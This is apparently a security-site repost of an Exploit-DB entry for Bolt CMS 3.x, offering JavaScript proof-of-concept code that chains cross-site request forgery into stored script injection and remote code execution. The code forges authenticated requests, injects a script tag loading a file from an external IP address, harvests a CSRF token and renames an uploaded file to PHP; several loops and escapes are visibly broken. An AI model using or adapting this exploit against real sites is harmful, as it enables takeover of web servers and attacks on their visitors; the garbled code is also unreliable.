Exploit/Advisories

Published on October 17th, 2019 📆 | 2153 Views ⚑

0

Bolt CMS 3.6.10 – Cross-Site Request Forgery


https://www.ispeech.org

# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
# Date: 2019-10-15
# Exploit Author: r3m0t3nu11[Zero-Way]
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.5
# Tested on: Linux
# CVE : N/A

# last version

# Csrf p0c

  
  
Bolt v 3.x exploit 0day


Bolt v 3.x csrf -> xss -> rce exploit




      function submitRequest()
      {
        Csrf = async () => {
        const xhr = new XMLHttpRequest();
        xhr.open("POST",
"http://127.0.0.1/index.php/async/folder/create",
true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "parent=&foldername=sss&namespace=files";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i  {
        if (xhr.readyState === 4 && xhr.status === 200){

};
 JSfuck1();
}

}
      JSfuck1 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/create",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "filename=aaa&parentPath=sss&namespace=files";
xhr.send(body1);
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){

}


};
where();
      }

      where = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/rename",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body2 =
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
xhr.send(body2);

}
          Csrf();
      }

    

      
    

  


JS p0c


Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/index.php/bolt/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);

}
};
xhr.send();
}



upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867rn" +
         "Content-Disposition: form-data; name="file_upload[select][]";
filename="r3m0t3nu11.txt"rn" +
          "Content-Type: text/plainrn" +
          "rn" +
          "rn" +
          "-----------------------------190530466613268610451083392867rn"
+
          "Content-Disposition: form-data;
name="file_upload[upload]"rn" +
          "rn" +
          "rn" +
          "-----------------------------190530466613268610451083392867rn"
+
          "Content-Disposition: form-data;
name="file_upload[_token]"rn" +
          "rn" +
          token

"-----------------------------190530466613268610451083392867--rn";

const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/bolt/files", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
 xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
  Shell();
}

};

 var aBody = new Uint8Array(body.length);
        for (var i = 0; i  {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
xhr.send(body1);
bypass();
}

bypass = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
xhr.send(body1);
bypass2();
}

bypass2 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
xhr.send(body1);

}



Token();



version 6.5

CSrf p0c

  

Bolt v 3.x CVE-2019-17591 exploit


Bolt v 3.x csrf -> xss -> rce exploit




      function submitRequest()
      {
        Csrf = async () => {
        const xhr = new XMLHttpRequest();
        xhr.open("POST",
"http://bolt-4mti18.bolt.dockerfly.com/async/file/create",
true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "filename=test&parentPath=&namespace=files";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i  {
        if (xhr.readyState === 4 && xhr.status === 200){
          JSfuck();
}
};


}
      JSfuck = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http://bolt-4mti18.bolt.dockerfly.com/async/file/rename",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "namespace=files&parent=&oldname=test&newname=";
xhr.send(body1);

}
          Csrf();
      }

    

      
    

  


Js p0c



Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/bolt/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);

}


}
xhr.send(null);
}



upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867rn" +
         "Content-Disposition: form-data; name="file_upload[select][]";
filename="r3m0t3nu11.txt"rn" +
          "Content-Type: text/plainrn" +
          "rn" +
          "rn" +
          "-----------------------------190530466613268610451083392867rn"
+
          "Content-Disposition: form-data;
name="file_upload[upload]"rn" +
          "rn" +
          "rn" +
          "-----------------------------190530466613268610451083392867rn"
+
          "Content-Disposition: form-data;
name="file_upload[_token]"rn" +
          "rn" +
          token

"-----------------------------190530466613268610451083392867--rn";

const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/bolt/files", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
      var aBody = new Uint8Array(body.length);
        for (var i = 0; i  {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1//async/file/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 =
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
xhr.send(body1);
}
Token();


proof of concept :

https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing

https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing

Greetz to :
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
Virus,m7md1337,D3vil1337,and all my friends





https://www.exploit-db.com/exploits/47501

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑